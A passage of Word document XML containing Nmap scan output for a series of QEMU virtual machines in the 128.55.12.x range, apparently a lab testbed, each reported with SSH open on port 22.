        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B05AAF3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:14 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537C16C0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A81A1EF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.65</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2E3407" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198EC118" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14927350" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515E8360" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:15 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E2E65F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68ACA4F3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta1-marple-1-dp (128.55.12.66)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4240E155" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1158AA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8342FC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AD6D20" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:16 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60404B93" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DA03646" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta1-marple-2-dp (128.55.12.67)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264ED62D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397B3F69" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483C686D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507EE9CD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:17 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDC2CE6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CB33BB6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.69</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73068BE2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3143FA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4609B6CB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB675F0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:19 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD7837A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75DBD2EF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.70</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D37FF15" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38417D9B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437C66E5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168432E4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:20 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A1042E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="042A5120" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.71</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6676E821" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB419F8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A553315" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61958D5C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:21 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415CEF5E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2557C709" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.72</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337B6E99" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214EC49E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D99D7D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687BB82C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:22 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D55622C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FA42B4A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta3-prometheus-1-dp (128.55.12.73)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581DB915" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07523692" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78042DA4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5357EC08" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:23 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F06C7B2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7227DADE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.74</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E04635E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0964FC92" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023A246A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B93B2E7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:24 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C430AD5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73035FB7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta1-cadets-2-dp (128.55.12.75)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637BD1EF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2031B1BE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7C796D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4B154E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:25 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7D087C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19BB4AE6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta52-windows-1-dp (128.55.12.76)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413528D4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.075s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6C2D99" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641E2597" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7394F7FB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:26 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FA4821" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00ADDBDB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta52-windows-2-dp (128.55.12.77)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D80713" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.075s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02942552" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0868695C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289EB0DA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:27 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF3536B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13D419F9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta52-ubuntu-1-dp (128.55.12.78)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF520BA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F54D0C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35999828" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606F055B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:28 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2D5132" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B90BC89" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta52-ubuntu-2-dp (128.55.12.79)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9DB7A7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9B3A03" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610D75B5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C697AD1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:29 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55998A80" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E6343E3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.81</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4130512D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.074s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A712F8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258FBC51" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16382B99" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:31 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ED3A98" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EED7A90" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.82</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3783B9A2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.075s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53755517" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574E3A02" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1432B8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:32 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EAAE6F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A32C03F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.83</w:t>
      </w:r>
    </w:p>
